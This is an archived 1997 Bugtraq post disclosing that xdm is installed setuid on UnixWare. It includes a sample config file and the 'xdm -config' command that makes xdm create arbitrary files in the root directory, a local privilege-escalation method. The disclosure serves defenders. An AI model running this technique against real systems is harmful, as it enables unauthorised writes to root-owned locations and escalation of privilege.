Bugtraq mailing list archives
XDM bug
From: angelo () tawny ssd hcsc com (Angel Ortiz)
Date: Thu, 2 Jan 1997 17:25:18 -0500
BUGTRAQRS: **************************DISCLAIMER AND WARNING*********************** The following information is provided as information to users in order to safeguard their systems. Users using this exploit are totally responsible for their actions ********************************************************************** I hope the following has not been documented in the past. If it has been, my humble apologies. Any way here is the problem. System: UNIX Ware systems with X Symptom: /usr/X/bin/xdm is setuid Exploit: If you do a man on xdm you will see that there is a command line option for a configuration file (-config). xdm [-config config_file] [-nodaemon] [-debug debug_level] [-error error_log_file] [-resources resource_file] [-server server_entry] By default, xdm uses the /usr/lib/xdm/xdm-config file. Out of curiosity, if you copy this file to your home directory you will be able to modify it and change where certain files are written to. For example, here is a sample xdm-config file which can reside in your home directory. ----------------------- Cut Here ------------------------------ #ident "@(#)xdm:config/xdm-conf.cpp 1.12.1.9" DisplayManager.companyLogoPixmap: /usr/X/lib/pixmaps/Nlogo.xpm DisplayManager.backgroundPixmap: /usr/X/lib/pixmaps/Npaper.xpm DisplayManager.showMnemonic: 1 DisplayManager.errorLogFile: /DANGEROUS-FILE DisplayManager.pidFile: /ALSO-DANGEROUS-FILE DisplayManager.keyFile: /usr/X/lib/xdm/xdm-keys DisplayManager.servers: /usr/X/lib/xdm/Xservers DisplayManager._0.authorize: true DisplayManager*authComplain: false DisplayManager._0.setup: /usr/X/lib/xdm/Xsetup_0 DisplayManager._0.terminateServer: true --------------------- Cut Here ------------------------------- Now, if you execute the following commands from a UNIX prompt: xdm -config dangerous-xdm-config-file You will create two files in the / directory. Guess what they are. Guess what can be done with such capabilities. Any way, please verify xdm setuid on your systems and please let the bugtraq news group know if it exists on other systems. Regards,
Current thread:
- XDM bug Angel Ortiz (Jan 02)
- <Possible follow-ups>
- Re: XDM bug Steve \ (Jan 03)
- Re: XDM bug jamie (Jan 03)
- Re: XDM bug Alex Belits (Jan 03)
- serious security bug in wu-ftpd v2.4 Aleph One (Jan 04)
- Re: serious security bug in wu-ftpd v2.4 Wietse Venema (Jan 04)
- Buffer overflow in the query cgi. Apropos of Nothing (Jan 04)
- Re: Buffer overflow in the query cgi. Thomas H. Ptacek (Jan 04)
- Re: XDM bug jamie (Jan 03)
- Re: XDM bug Mr. ManX (Jan 03)